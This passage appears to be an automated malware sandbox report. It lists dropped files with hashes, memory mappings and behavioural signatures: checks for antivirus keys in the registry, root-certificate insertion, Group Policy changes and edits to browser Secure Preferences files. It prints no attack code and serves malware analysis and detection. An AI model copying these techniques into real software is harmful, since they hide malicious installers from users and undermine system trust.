| SHA256 | 85e03805f90f72257dd41bfdaa186237218bbb0ec410ad3b6576a88ea11dccb9 |
| SHA512 | 5fd4f516ce23fb7e705e150d5c1c93fc7133694ba495fb73101674a528883a013a34ab258083aa7ce6072973b067a605158316a4c9159c1b4d765761f91c513d |
memory/3732-235-0x0000000000000000-mapping.dmp
memory/5096-236-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\nss4BAC.tmp\liteFirewall.dll
| MD5 | 165e1ef5c79475e8c33d19a870e672d4 |
| SHA1 | 965f02bfd103f094ac6b3eef3abe7fdcb8d9e2a5 |
| SHA256 | 9db9c58e44dff2d985dc078fdbb7498dcc66c4cc4eb12f68de6a98a5d665abbd |
| SHA512 | cd10eaf0928e5df048bf0488d9dbfe9442e2e106396a0967462bef440bf0b528cdf3ab06024fb6fdaf9f247e2b7f3ca0cea78afc0ce6943650ef9d6c91fee52a |
memory/828-238-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\InfoInstall\InfoInstall.exe
| MD5 | b3dba6728cf861a741a710442088683a |
| SHA1 | bf3a57590117cae01c9911f82c69dbe71e5968db |
| SHA256 | a9ada8996fc6ae710b6b74d1db7f1557cf5e52589872fdc6ed685e1e7e1acfa2 |
| SHA512 | 7dba6cd1c6b24558055be15fbe88e7859487c4e8f07553123bc4089f31615b166321712f79d10ffa970f8c91851e7f07f0e4d0ba06141496c675172ee8a1f6d9 |
C:\Users\Admin\AppData\Local\Temp\nss4BAC.tmp\nsProcess.dll
| MD5 | f0438a894f3a7e01a4aae8d1b5dd0289 |
| SHA1 | b058e3fcfb7b550041da16bf10d8837024c38bf6 |
| SHA256 | 30c6c3dd3cc7fcea6e6081ce821adc7b2888542dae30bf00e881c0a105eb4d11 |
| SHA512 | f91fcea19cbddf8086affcb63fe599dc2b36351fc81ac144f58a80a524043ddeaa3943f36c86ebae45dd82e8faf622ea7b7c9b776e74c54b93df2963cfe66cc7 |
C:\Users\Admin\AppData\Roaming\InfoInstall\InfoInstall.exe
| MD5 | b3dba6728cf861a741a710442088683a |
| SHA1 | bf3a57590117cae01c9911f82c69dbe71e5968db |
| SHA256 | a9ada8996fc6ae710b6b74d1db7f1557cf5e52589872fdc6ed685e1e7e1acfa2 |
| SHA512 | 7dba6cd1c6b24558055be15fbe88e7859487c4e8f07553123bc4089f31615b166321712f79d10ffa970f8c91851e7f07f0e4d0ba06141496c675172ee8a1f6d9 |
C:\Users\Admin\AppData\Local\Temp\nss4BAC.tmp\INetC.dll
| MD5 | 40d7eca32b2f4d29db98715dd45bfac5 |
| SHA1 | 124df3f617f562e46095776454e1c0c7bb791cc7 |
| SHA256 | 85e03805f90f72257dd41bfdaa186237218bbb0ec410ad3b6576a88ea11dccb9 |
| SHA512 | 5fd4f516ce23fb7e705e150d5c1c93fc7133694ba495fb73101674a528883a013a34ab258083aa7ce6072973b067a605158316a4c9159c1b4d765761f91c513d |
C:\Users\Admin\AppData\Local\Temp\nss4BAC.tmp\md5dll.dll
| MD5 | 7059f133ea2316b9e7e39094a52a8c34 |
| SHA1 | ee9f1487c8152d8c42fecf2efb8ed1db68395802 |
| SHA256 | 32c3d36f38e7e8a8bafd4a53663203ef24a10431bda16af9e353c7d5d108610f |
| SHA512 | 9115986754a74d3084dd18018e757d3b281a2c2fde48c73b71dba882e13bd9b2ded0e6e7f45dc5b019e6d53d086090ccb06e18e6efeec091f655a128510cbe51 |
memory/828-244-0x0000000000660000-0x00000000006B4000-memory.dmp
memory/828-245-0x00007FFAE29A0000-0x00007FFAE3461000-memory.dmp
C:\Users\Admin\AppData\Roaming\InfoInstall\Newtonsoft.Json.dll
| MD5 | 486015a44a273c6c554a27b3d498365c |
| SHA1 | cb08f5d7240dfcdcd77de754259b36c0d9a2a034 |
| SHA256 | 6a168461c721fd14163751f7839fb8d67483cb5831f1b2b1ab3e96a68b82d384 |
| SHA512 | 1578ed43e815017c269d2a37bb9cdc16d51209bfa6bdb7276ad67cbb39955708826973ac7f48c795e6a1361e7d2a14b14b6cea02ee9ecf396a4b02313aada1d6 |
memory/828-247-0x000000001CD90000-0x000000001CE22000-memory.dmp
C:\Users\Admin\AppData\Roaming\InfoInstall\FileOperation.dll
| MD5 | e5d09907a04a7b97500654d71dd3b110 |
| SHA1 | 445c074d92489b85047434ca6938d583c4ca33e8 |
| SHA256 | 33b35e980bf35baaf23ee36e61ae2a758c6627e83e6ca447e67da85ca1062a94 |
| SHA512 | 0cb70775859769be9a536c78abb8a728f2af554369397c8e252de566c05e15037ab4ee105e692915619799327e75609ee673866a353e3fff3dafb0d1f668ed37 |
memory/828-249-0x00000000026E0000-0x00000000026E8000-memory.dmp
memory/1116-250-0x0000000006E50000-0x00000000073F4000-memory.dmp
memory/828-252-0x000000001C830000-0x000000001C852000-memory.dmp
memory/1116-251-0x00000000069A0000-0x0000000006A32000-memory.dmp
memory/1116-253-0x0000000006A40000-0x0000000006AA6000-memory.dmp
memory/5088-254-0x00007FFAE29A0000-0x00007FFAE3461000-memory.dmp
memory/828-255-0x0000000002730000-0x0000000002738000-memory.dmp
memory/828-256-0x000000001CD30000-0x000000001CD68000-memory.dmp
memory/828-257-0x0000000002740000-0x000000000274E000-memory.dmp
memory/828-258-0x000000001C870000-0x000000001C878000-memory.dmp
memory/1116-259-0x00000000080B0000-0x0000000008272000-memory.dmp
memory/1116-260-0x00000000087B0000-0x0000000008CDC000-memory.dmp
memory/2232-261-0x0000000000000000-mapping.dmp
memory/5088-262-0x00007FFAE29A0000-0x00007FFAE3461000-memory.dmp
memory/3996-263-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\SoundBoseRemove.exe
| MD5 | 3896ef0883ecedca578c79f2af731755 |
| SHA1 | 1131214b3e15078dc9ec9a93c1231557e86d5fea |
| SHA256 | 43f9a5d818bdc3b41e72e9d5b6844c70039cb82a1cba6d34fadbc3adefe7a9ee |
| SHA512 | a3a9728f780740ad9d1a937a111ab72877b8f0c9d5ffaf8b0530f74b4cc4336c2d8df4a331d9e62ba97d88e120949b4b75b97028f6be899c9e8a4bd9c6d668bc |
C:\Users\Admin\AppData\Local\Temp\SoundBoseRemove.exe
| MD5 | 3896ef0883ecedca578c79f2af731755 |
| SHA1 | 1131214b3e15078dc9ec9a93c1231557e86d5fea |
| SHA256 | 43f9a5d818bdc3b41e72e9d5b6844c70039cb82a1cba6d34fadbc3adefe7a9ee |
| SHA512 | a3a9728f780740ad9d1a937a111ab72877b8f0c9d5ffaf8b0530f74b4cc4336c2d8df4a331d9e62ba97d88e120949b4b75b97028f6be899c9e8a4bd9c6d668bc |
memory/2516-266-0x0000000000000000-mapping.dmp
memory/3996-267-0x000000000C1D0000-0x000000000C326000-memory.dmp
memory/828-268-0x00007FFAE29A0000-0x00007FFAE3461000-memory.dmp
memory/3996-269-0x0000000002770000-0x00000000028CB000-memory.dmp
memory/4200-270-0x0000000000000000-mapping.dmp
memory/3996-271-0x000000000C1D0000-0x000000000C326000-memory.dmp
memory/1676-272-0x0000000000000000-mapping.dmp
memory/1952-273-0x0000000000000000-mapping.dmp
memory/1952-274-0x0000000000400000-0x000000000041E000-memory.dmp
memory/1952-276-0x0000000000400000-0x000000000041E000-memory.dmp
memory/1952-278-0x0000000000400000-0x000000000041E000-memory.dmp
memory/2284-280-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\240684218.dll
| MD5 | acf51213c2e0b564c28cf0db859c9e38 |
| SHA1 | 0ec6d956dd0299a8d26bd4671af11c9c3fbe2ca0 |
| SHA256 | 643044a62d07c6725a73bce3ee702ad0c15f0fe332165821c5e7f73937f898b7 |
| SHA512 | 15f30f50afdc2838ebdc4f38199f9857c1b9bc43350588abed404dcaef039698a2533dd5c074d2bfc88448a578c2202c033073592a9c551f7a7e4d263e293eed |
memory/1952-281-0x0000000000400000-0x000000000041E000-memory.dmp
memory/2684-282-0x0000000000000000-mapping.dmp
memory/3408-283-0x0000000000400000-0x0000000000435000-memory.dmp
memory/3408-284-0x0000000000000000-mapping.dmp
memory/3408-285-0x0000000000400000-0x0000000000435000-memory.dmp
memory/3408-286-0x0000000000A05000-0x0000000000A07000-memory.dmp
memory/3408-287-0x0000000000A05000-0x0000000000A07000-memory.dmp
memory/3408-288-0x0000000000880000-0x000000000089D000-memory.dmp
memory/3408-289-0x0000000002580000-0x0000000003580000-memory.dmp
memory/3996-290-0x0000000002770000-0x00000000028CB000-memory.dmp
memory/3996-291-0x000000000C1D0000-0x000000000C326000-memory.dmp
memory/3408-292-0x0000000000400000-0x0000000000435000-memory.dmp
memory/3996-293-0x0000000002770000-0x00000000028CB000-memory.dmp
memory/1952-294-0x0000000000400000-0x000000000041E000-memory.dmp
memory/4056-295-0x0000000000A80000-0x0000000000F15000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\UwoKNgjfMpAQohzjy\vZixTOWAjXczfOR\Fkxufiu.exe
| MD5 | c11030bd1b9b76d5371f5d3e42d7620f |
| SHA1 | 20eac9ec20130b18a07eb883172afcedf39ba350 |
| SHA256 | a65b6626714168ad401984f586998df6d5d256ae6d93629b1cc92e888ad33780 |
| SHA512 | 69f6bbf6b8f27ac62746a4abd469ab17659c6d19ab6de76278f391a8f094cfc77a9a2f8b163b0a6d179fbdf8eb956c4d01435dc15256fc6c01941bd351e6f020 |
C:\Users\Admin\AppData\Local\Temp\UwoKNgjfMpAQohzjy\vZixTOWAjXczfOR\Fkxufiu.exe
| MD5 | c11030bd1b9b76d5371f5d3e42d7620f |
| SHA1 | 20eac9ec20130b18a07eb883172afcedf39ba350 |
| SHA256 | a65b6626714168ad401984f586998df6d5d256ae6d93629b1cc92e888ad33780 |
| SHA512 | 69f6bbf6b8f27ac62746a4abd469ab17659c6d19ab6de76278f391a8f094cfc77a9a2f8b163b0a6d179fbdf8eb956c4d01435dc15256fc6c01941bd351e6f020 |
memory/1080-298-0x0000000034730000-0x0000000035730000-memory.dmp
memory/4624-301-0x0000000000000000-mapping.dmp
memory/4624-302-0x00000000017A0000-0x00000000017D6000-memory.dmp
memory/4624-303-0x0000000004200000-0x0000000004828000-memory.dmp
memory/4624-304-0x00000000041D0000-0x00000000041F2000-memory.dmp
memory/4624-305-0x00000000049A0000-0x0000000004A06000-memory.dmp
memory/4624-306-0x00000000050A0000-0x00000000050BE000-memory.dmp
memory/2684-307-0x0000000000000000-mapping.dmp
memory/3052-308-0x0000000000000000-mapping.dmp
memory/4504-309-0x0000000000000000-mapping.dmp
memory/2616-310-0x0000000000000000-mapping.dmp
memory/4720-311-0x0000000000000000-mapping.dmp
memory/1012-312-0x0000000000000000-mapping.dmp
memory/4472-313-0x0000000000000000-mapping.dmp
memory/5112-314-0x0000000000000000-mapping.dmp
memory/3080-315-0x0000000000000000-mapping.dmp
memory/1784-316-0x0000000000000000-mapping.dmp
memory/1808-317-0x0000000000000000-mapping.dmp
memory/632-318-0x0000000000000000-mapping.dmp
memory/4104-319-0x0000000000000000-mapping.dmp
memory/3536-320-0x0000000000000000-mapping.dmp
memory/4280-321-0x0000000000000000-mapping.dmp
memory/1740-322-0x0000000000000000-mapping.dmp
memory/4048-323-0x0000000000000000-mapping.dmp
memory/3456-324-0x0000000000000000-mapping.dmp
memory/3496-325-0x0000000000000000-mapping.dmp
memory/3636-326-0x0000000000000000-mapping.dmp
memory/3560-327-0x0000000000000000-mapping.dmp
memory/4932-328-0x0000000000000000-mapping.dmp
memory/4548-329-0x0000000000000000-mapping.dmp
memory/4336-330-0x0000000000000000-mapping.dmp
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | 33b19d75aa77114216dbc23f43b195e3 |
| SHA1 | 36a6c3975e619e0c5232aa4f5b7dc1fec9525535 |
| SHA256 | b23ced31b855e5a39c94afa1f9d55b023b8c40d4dc62143e0539c6916c12c9d2 |
| SHA512 | 676fa2fd34878b75e5899197fe6826bb5604541aa468804bc9835bd3acabed2e6759878a8f1358955413818a51456816e90f149133828575a416c2a74fc7d821 |
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 3bb0bdb597a1fd127cbaa4f35302c377 |
| SHA1 | 29070fd60ac0ababfecf73c26649eeae8c8f430d |
| SHA256 | 3787ce358aaab53861b94920588489cca71d0dc81a2e3f0dc563ea1f0c243b3b |
| SHA512 | 6a114cc4360bc87c708c476462919acdf7a36084a7348d81042fe9cd48374258ba3969b498b0ca9a9444b53e800344d560ee43ed4a2c9ddeb254a93d41216ec1 |
C:\Windows\system32\GroupPolicy\gpt.ini
| MD5 | a62ce44a33f1c05fc2d340ea0ca118a4 |
| SHA1 | 1f03eb4716015528f3de7f7674532c1345b2717d |
| SHA256 | 9f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a |
| SHA512 | 9d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log
| MD5 | 6cf293cb4d80be23433eecf74ddb5503 |
| SHA1 | 24fe4752df102c2ef492954d6b046cb5512ad408 |
| SHA256 | b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8 |
| SHA512 | 0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | d8b9a260789a22d72263ef3bb119108c |
| SHA1 | 376a9bd48726f422679f2cd65003442c0b6f6dd5 |
| SHA256 | d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc |
| SHA512 | 550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b |
memory/5036-336-0x00007FFAE29A0000-0x00007FFAE3461000-memory.dmp
memory/5036-337-0x00007FFAE29A0000-0x00007FFAE3461000-memory.dmp
C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe
| MD5 | c11030bd1b9b76d5371f5d3e42d7620f |
| SHA1 | 20eac9ec20130b18a07eb883172afcedf39ba350 |
| SHA256 | a65b6626714168ad401984f586998df6d5d256ae6d93629b1cc92e888ad33780 |
| SHA512 | 69f6bbf6b8f27ac62746a4abd469ab17659c6d19ab6de76278f391a8f094cfc77a9a2f8b163b0a6d179fbdf8eb956c4d01435dc15256fc6c01941bd351e6f020 |
C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe
| MD5 | c11030bd1b9b76d5371f5d3e42d7620f |
| SHA1 | 20eac9ec20130b18a07eb883172afcedf39ba350 |
| SHA256 | a65b6626714168ad401984f586998df6d5d256ae6d93629b1cc92e888ad33780 |
| SHA512 | 69f6bbf6b8f27ac62746a4abd469ab17659c6d19ab6de76278f391a8f094cfc77a9a2f8b163b0a6d179fbdf8eb956c4d01435dc15256fc6c01941bd351e6f020 |
memory/4748-340-0x0000000034CC0000-0x0000000035CC0000-memory.dmp
memory/4748-343-0x0000000049890000-0x0000000049915000-memory.dmp
C:\Program Files\Mozilla Firefox\browser\omni.ja
| MD5 | 3569909da198e6681650054ebafa2190 |
| SHA1 | dd4fd1cb0c899b98a2322657b77787ce18f3d7ac |
| SHA256 | cd02424977b06035e2d3f6c6a75c488b11480b135e817bc870589df608b8a112 |
| SHA512 | 571faa39b136aff1f32957f85e6cef34f5f7f26596ab2563f719c7e857e20bbb0aa520d41bc8edd8bc9f835a11c24f5531b2e854c7ad521843390387e8774404 |
memory/4748-348-0x0000000049B60000-0x0000000049BC4000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
| MD5 | cbd67300a1b97005c288550af7942b8f |
| SHA1 | 929592e3fc36c2d18ef541c65d798f1ed4ad558e |
| SHA256 | c6150ebeaca05e32c24d358dfc6e0984324c84b819d57c77107dbc63a40f2e2e |
| SHA512 | 41c06af16fe2340a2d546b252857bbf29a87589f23a2d169462274f557ba73240823daec4eb6fe8aff270d40e20a4658709ecbc4112a1547b577a1012cda2346 |
C:\Windows\system32\GroupPolicy\Machine\Registry.pol
| MD5 | 7b3f9454b5839584f6bbe4ce0638250e |
| SHA1 | 95010293da90d63f1f39c1404373bb313fd32d89 |
| SHA256 | 8a62787f7a8eb7ddac05dadc6254e3c49a254fe10e3bd21f7b229f57b4d2e3af |
| SHA512 | 634239e5f569754b1fb46cd5eaf0b074a6d88ba3678ed96b72fd4c0dd3ab9866a77ad9fbc122a5736bbd89a15337efa6039ec6c43b0be8beac0a6446e8fc64e9 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences
| MD5 | e2221c6301727cd1b2adffe308c15728 |
| SHA1 | 92fb0f132888e9bd32b8d6be5832c8571581618c |
| SHA256 | 7e545868f36b3755c80466719c6d8920179f398136c0f6d99f986f4ace744329 |
| SHA512 | 3f7ee9c5a809487e67e2ed5d8fd2130e5069b59e669abb2cc0ed9537504e6cd745af950e142247b45e78074a67caa855b9194d42ca3a7a16e6b6ce98114e1b5a |
C:\Program Files (x86)\XxxUzwYQU\GnbMyEB.xml
| MD5 | 915c57cdbffb1a77efc21e2e004e6f7e |
| SHA1 | 1f76377a7ed327aaa87f4b4f43f028721e96fb1a |
| SHA256 | 18dd7af08cc8cee0cc79c17e5a411a16878f98d5bfdc676f42370ad27ff5aa00 |
| SHA512 | fa985685aa1e56f779bc0d6b144ad31f770f18252870e5e63243bdef676a212ee8452f60f4a0af4476e7707e77ae90b3f742a7ffbbc8d2d6cf2628383a80231e |
C:\Program Files (x86)\WyuevociGfNU2\LzOYMrW.xml
| MD5 | a34f1550125d7aeff98af080c0472cf6 |
| SHA1 | c467a5d721c78b570606091a393a9b9b66423bfd |
| SHA256 | 197c9900b4e837627a911aa5b6c827ae8b45ac24c711d28325db451128f328a5 |
| SHA512 | 0cc8a40b912c4e0df4db03b10a82d398dc7833d3c0a7de100436e84da59122037bfdd0d7554a40e0adb7a2a8e508a92e903d983c54db0758d8a4a5ba8197a7b0 |
C:\ProgramData\FZMYpcBymcbXiuVB\WUpZOtb.xml
| MD5 | fd1e5f7e6d4ba02f19cd04987e89aaa0 |
| SHA1 | e6aea34f856582af5a07991624a41dceaea84562 |
| SHA256 | d68de4e1fbc953f2aeb34852a1a15e65e858344af1875ea6f2bbf9ca310fa71f |
| SHA512 | e84a9ef02a58510eed0dac3924170cf12fc85b505665d86b15c0ee1d6f19a66bd231e4461e52e0af7cb6990a821afafaedb50c975204f61e8a75056c26d0cdc4 |
C:\Program Files (x86)\OdCkbftzuRPDCLooswR\dsKYSUK.xml
| MD5 | b2407ed7c6a616158688e9b988f13f4b |
| SHA1 | 55b5041b16079e33a68b433304df423deeda71c4 |
| SHA256 | 03f4fb9a1d7025f28fa8cefc0cf7437586b7c3eb26a5f3171a3bac24f1e62c7b |
| SHA512 | 20c99a6dd4a679a99232ade17682270e2522a005c797c4912095b6aaf48301ac8176727e15b1e4d6643f04d8855c293c760b8902ddcf8b0f745eac14268fd3eb |
C:\Program Files (x86)\unWhUoTpcLxwC\CqRtzkA.xml
| MD5 | 2335af0a295e267dfd6912d7d89eb008 |
| SHA1 | 0bdbd0b7cb70a4fc808e9e98be349cd1e5a6b424 |
| SHA256 | 0a9608aa0dc1e97d9b43f14afbfec3f65507cfba5153a571391787b3bcafc537 |
| SHA512 | 0e06c7f5707c28da79012520ce7288a046e56816d0a384aeaa9625132dacacff3fca881382c643310547058d85d903e3fc839c261bb5f59d3910052e5893b281 |
memory/4748-359-0x000000004A670000-0x000000004A6E5000-memory.dmp
memory/4748-362-0x000000004A7B0000-0x000000004A869000-memory.dmp
memory/2444-365-0x0000000010000000-0x0000000011000000-memory.dmp
memory/2444-367-0x0000000010630000-0x0000000011630000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2023-01-15 17:11
Reported
2023-01-15 17:16
Platform
win10v2004-20221111-en
Max time kernel
84s
Max time network
154s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\setup10298.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS0B33D9A6\GenericSetup.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\setup10298.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS4F7863E7\GenericSetup.exe | N/A |
Loads dropped DLL
Checks for any installed AV software in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\AVAST Software\Avast | C:\Users\Admin\AppData\Local\Temp\7zS0B33D9A6\GenericSetup.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\AVG\AV\Dir | C:\Users\Admin\AppData\Local\Temp\7zS0B33D9A6\GenericSetup.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\AVG\AV | C:\Users\Admin\AppData\Local\Temp\7zS0B33D9A6\GenericSetup.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\AVG\AV\Dir | C:\Users\Admin\AppData\Local\Temp\7zS0B33D9A6\GenericSetup.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\AVG\AV | C:\Users\Admin\AppData\Local\Temp\7zS0B33D9A6\GenericSetup.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\AVAST Software\Avast\Version | C:\Users\Admin\AppData\Local\Temp\7zS0B33D9A6\GenericSetup.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\AVAST Software\Avast | C:\Users\Admin\AppData\Local\Temp\7zS0B33D9A6\GenericSetup.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\AVAST Software\Avast\Version | C:\Users\Admin\AppData\Local\Temp\7zS0B33D9A6\GenericSetup.exe | N/A |
Checks installed software on the system
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\7zS0B33D9A6\GenericSetup.exe |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 5c000000010000000400000000100000190000000100000010000000ffac207997bb2cfe865570179ee037b9030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e41d0000000100000010000000a86dc6a233eb339610f3ed414927c559140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac899880b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e199604000000010000001000000078f2fcaa601f2fb4ebc937ba532e75492000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e | C:\Users\Admin\AppData\Local\Temp\7zS0B33D9A6\GenericSetup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4 | C:\Users\Admin\AppData\Local\Temp\7zS0B33D9A6\GenericSetup.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 0f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703080b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac89988140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f1d0000000100000010000000a86dc6a233eb339610f3ed414927c559030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e42000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b